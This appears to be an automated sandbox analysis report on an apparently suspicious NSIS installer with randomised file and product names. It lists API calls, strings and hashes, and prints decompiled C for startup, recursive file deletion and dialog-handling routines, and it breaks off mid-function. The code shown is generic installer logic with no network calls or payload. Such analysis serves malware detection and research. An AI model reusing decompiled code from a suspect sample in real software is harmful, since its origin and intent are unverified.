                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403508
                                                                                            0x0040350e
                                                                                            0x00403510
                                                                                            0x00403512
                                                                                            0x00403521
                                                                                            0x00403523
                                                                                            0x00000000
                                                                                            0x00403523
                                                                                            0x00000000
                                                                                            0x00403512
                                                                                            0x00403506
                                                                                            0x0040337f
                                                                                            0x00403386
                                                                                            0x00403386
                                                                                            0x004032fc
                                                                                            0x00403302
                                                                                            0x00403351
                                                                                            0x00403351
                                                                                            0x0040335d
                                                                                            0x00000000
                                                                                            0x0040335d
                                                                                            0x0040330b
                                                                                            0x00403318
                                                                                            0x0040330f
                                                                                            0x00403315
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403317
                                                                                            0x00403317
                                                                                            0x00403317
                                                                                            0x0040331c
                                                                                            0x0040331e
                                                                                            0x00403326
                                                                                            0x00403397
                                                                                            0x00403399
                                                                                            0x004033a0
                                                                                            0x004033a8
                                                                                            0x004033a8
                                                                                            0x004033b3
                                                                                            0x004033b8
                                                                                            0x004033c7
                                                                                            0x004033cb
                                                                                            0x004033cc
                                                                                            0x004033d5
                                                                                            0x004033ce
                                                                                            0x004033ce
                                                                                            0x004033ce
                                                                                            0x004033db
                                                                                            0x004033e1
                                                                                            0x004033e7
                                                                                            0x004033ef
                                                                                            0x004033ef
                                                                                            0x004033fd
                                                                                            0x00403404
                                                                                            0x0040340d
                                                                                            0x00403413
                                                                                            0x00403413
                                                                                            0x0040341f
                                                                                            0x00403425
                                                                                            0x0040342f
                                                                                            0x00403439
                                                                                            0x0040343f
                                                                                            0x00403441
                                                                                            0x00403443
                                                                                            0x00403444
                                                                                            0x00403445
                                                                                            0x0040344a
                                                                                            0x00403456
                                                                                            0x0040345c
                                                                                            0x00403463
                                                                                            0x00403466
                                                                                            0x0040346c
                                                                                            0x0040346c
                                                                                            0x00403463
                                                                                            0x00403441
                                                                                            0x00403470
                                                                                            0x00403476
                                                                                            0x00403476
                                                                                            0x00403476
                                                                                            0x00403479
                                                                                            0x0040347a
                                                                                            0x0040347b
                                                                                            0x0040347b
                                                                                            0x00000000
                                                                                            0x004033c7
                                                                                            0x00403328
                                                                                            0x0040332a
                                                                                            0x00403335
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040333d
                                                                                            0x00403348
                                                                                            0x0040334d
                                                                                            0x00000000
                                                                                            0x0040334d
                                                                                            0x004032c2
                                                                                            0x004032ce
                                                                                            0x004032d3
                                                                                            0x004032d8
                                                                                            0x004032da
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403277
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403227
                                                                                            0x00403227
                                                                                            0x00403227
                                                                                            0x00403228
                                                                                            0x00403228
                                                                                            0x00000000
                                                                                            0x00403227
                                                                                            0x00000000
                                                                                            0x00403178
                                                                                            0x00403179
                                                                                            0x00403185
                                                                                            0x0040318b
                                                                                            0x00000000
                                                                                            0x0040318d
                                                                                            0x0040318f
                                                                                            0x00403196
                                                                                            0x0040319b
                                                                                            0x004031a0
                                                                                            0x004031a7
                                                                                            0x004031ad
                                                                                            0x004031c3
                                                                                            0x004031d3
                                                                                            0x004031d8
                                                                                            0x004031de
                                                                                            0x004031e5
                                                                                            0x004031f8
                                                                                            0x004031fd
                                                                                            0x004031ff
                                                                                            0x00403201
                                                                                            0x00403206
                                                                                            0x00403206
                                                                                            0x00403216
                                                                                            0x0040321c
                                                                                            0x00000000
                                                                                            0x0040321c

                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE ref: 00403150
                                                                                            • GetVersion.KERNEL32 ref: 00403156
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                                                                            • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                                                                            • OleInitialize.OLE32(00000000), ref: 004031A7
                                                                                            • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                                                                            • GetCommandLineA.KERNEL32(gqjlpjiaybpobgywdcz Setup,NSIS Error), ref: 004031D8
                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,00000000), ref: 004031EB
                                                                                            • CharNextA.USER32(00000000,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,00409168), ref: 00403216
                                                                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                                                                              • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                              • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                            • OleUninitialize.OLE32(00000020), ref: 00403366
                                                                                            • ExitProcess.KERNEL32 ref: 00403386
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,00000000,00000020), ref: 00403399
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,00000000,00000020), ref: 004033A8
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,00000000,00000020), ref: 004033B3
                                                                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Program Files (x86)\Gw4n,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" ,00000000,00000020), ref: 004033BF
                                                                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                            • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                                                                            • CopyFileA.KERNEL32(C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,00428C58,00000001), ref: 00403439
                                                                                            • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
                                                                                            • ExitProcess.KERNEL32 ref: 0040353A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                            • String ID: $ /D=$ _?=$"$"C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" $.tmp$1033$C:\Program Files (x86)\Gw4n$C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$gqjlpjiaybpobgywdcz Setup$~nsu
                                                                                            • API String ID: 3469842172-1453263773
                                                                                            • Opcode ID: 9448f30a402cd05d4ed19a4029ce3e8ae183e0eaa977f2d261942117e08e1749
                                                                                            • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                                                                            • Opcode Fuzzy Hash: 9448f30a402cd05d4ed19a4029ce3e8ae183e0eaa977f2d261942117e08e1749
                                                                                            • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040579B(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42eca8 =  *0x42eca8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405BC7(0x42b0a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405701(_t72);
					} else {
						lstrcatA(0x42b0a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405BC7(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040587F(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404EB3(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42eca8 =  *0x42eca8 + 1;
										} else {
											E00404EB3(0xfffffff1, _t72);
											E00405915(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054EC(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42b0a8 - 0x5c;
					if( *0x42b0a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405EC2(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004056BA(_t72);
							E0040587F(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404EB3(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404EB3(0xfffffff1, _t72);
							return E00405915(__eflags, _t72, 0);
						}
						L33:
						 *0x42eca8 =  *0x42eca8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                            0x004054f7
                                                                                            0x004054fb
                                                                                            0x00405504
                                                                                            0x00405507
                                                                                            0x0040550a
                                                                                            0x00405512
                                                                                            0x00405514
                                                                                            0x00405515
                                                                                            0x00000000
                                                                                            0x00405515
                                                                                            0x00405524
                                                                                            0x00405524
                                                                                            0x00405527
                                                                                            0x0040552a
                                                                                            0x0040553e
                                                                                            0x00405545
                                                                                            0x0040554a
                                                                                            0x0040554c
                                                                                            0x0040555c
                                                                                            0x0040554e
                                                                                            0x00405554
                                                                                            0x00405554
                                                                                            0x00405561
                                                                                            0x00405564
                                                                                            0x0040556f
                                                                                            0x00405575
                                                                                            0x0040557a
                                                                                            0x0040558a
                                                                                            0x0040558c
                                                                                            0x00405592
                                                                                            0x00405595
                                                                                            0x00405598
                                                                                            0x00405655
                                                                                            0x00405655
                                                                                            0x00405659
                                                                                            0x0040565b
                                                                                            0x0040565b
                                                                                            0x0040565b
                                                                                            0x0040565b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040559e
                                                                                            0x0040559e
                                                                                            0x004055a7
                                                                                            0x004055ad
                                                                                            0x004055b2
                                                                                            0x004055b5
                                                                                            0x004055b7
                                                                                            0x004055bb
                                                                                            0x004055bd
                                                                                            0x004055bd
                                                                                            0x004055bb
                                                                                            0x004055c0
                                                                                            0x004055c3
                                                                                            0x004055d6
                                                                                            0x004055d8
                                                                                            0x004055dd
                                                                                            0x004055e4
                                                                                            0x004055fc
                                                                                            0x00405602
                                                                                            0x00405608
                                                                                            0x0040560a
                                                                                            0x0040562f
                                                                                            0x0040560c
                                                                                            0x0040560c
                                                                                            0x00405610
                                                                                            0x00405624
                                                                                            0x00405612
                                                                                            0x00405615
                                                                                            0x0040561d
                                                                                            0x0040561d
                                                                                            0x00405610
                                                                                            0x004055e6
                                                                                            0x004055ec
                                                                                            0x004055ee
                                                                                            0x004055f4
                                                                                            0x004055f4
                                                                                            0x004055ee
                                                                                            0x00000000
                                                                                            0x004055e4
                                                                                            0x004055c5
                                                                                            0x004055c8
                                                                                            0x004055ca
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004055cc
                                                                                            0x004055ce
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004055d0
                                                                                            0x004055d4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405634
                                                                                            0x0040563e
                                                                                            0x00405644
                                                                                            0x00405644
                                                                                            0x0040564f
                                                                                            0x00000000
                                                                                            0x0040564f
                                                                                            0x00405566
                                                                                            0x0040556d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040552c
                                                                                            0x0040552c
                                                                                            0x0040552e
                                                                                            0x0040565f
                                                                                            0x00405662
                                                                                            0x00405665
                                                                                            0x004056b7
                                                                                            0x004056b7
                                                                                            0x004056b7
                                                                                            0x00405667
                                                                                            0x0040566a
                                                                                            0x00405675
                                                                                            0x0040567a
                                                                                            0x0040567c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040567f
                                                                                            0x00405685
                                                                                            0x0040568b
                                                                                            0x00405691
                                                                                            0x00405693
                                                                                            0x00000000
                                                                                            0x004056af
                                                                                            0x00405695
                                                                                            0x00405699
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040569e
                                                                                            0x00000000
                                                                                            0x004056a5
                                                                                            0x0040566c
                                                                                            0x0040566c
                                                                                            0x00000000
                                                                                            0x0040566c
                                                                                            0x00405534
                                                                                            0x00405538
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405538

                                                                                            APIs
                                                                                            • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                                                                            • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                                                                            • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                                                                            • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                                                                            • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                                                                            • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
                                                                                            • FindClose.KERNEL32(?), ref: 0040564F
                                                                                            Strings
                                                                                            • "C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" , xrefs: 004054EC
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
                                                                                            • \*.*, xrefs: 0040554E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: "C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                            • API String ID: 2035342205-3282039624
                                                                                            • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                                                            • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                                                                            • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                                                            • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405EC2(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0f0;
			}




                                                                                            0x00405ecd
                                                                                            0x00405ed6
                                                                                            0x00000000
                                                                                            0x00405ee3
                                                                                            0x00405ed9
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405ED9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID:
                                                                                            • API String ID: 2295610775-0
                                                                                            • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                            • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                                                                            • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                            • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 84%
                                                                                            			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a084 = _t35;
					if(_t115 == 0x110) {
						 *0x42ec28 = _t125;
						 *0x42a098 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429060 = _t91;
						E00403E83(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e408); // executed
						 *0x42e3ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a084 = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ec40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403ECF(0x40b);
						while(1) {
							_t37 =  *0x42a084;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x42ec44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e3ec - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ec44; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E83(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ecac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403EA5(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x429060, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ecac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a098);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x429060);
							}
							E00403EB8();
							E00405BC7(0x42a0a0, "gqjlpjiaybpobgywdcz Setup");
							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a0a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e3f8);
									 *0x429870 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e3f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E83(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e3ec - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e3f8, 8);
									E00403ECF(0x405);
									goto L58;
								}
								__eflags =  *0x42ecac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42eca0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e3f8);
						 *0x42ec28 = _t133;
						EndDialog(_t125,  *0x429468);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
						__eflags =  *0x42e3ec - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EEA(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ecac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x429468 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E5C();
											goto L26;
										}
										E0040140B(_t127);
										 *0x429468 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
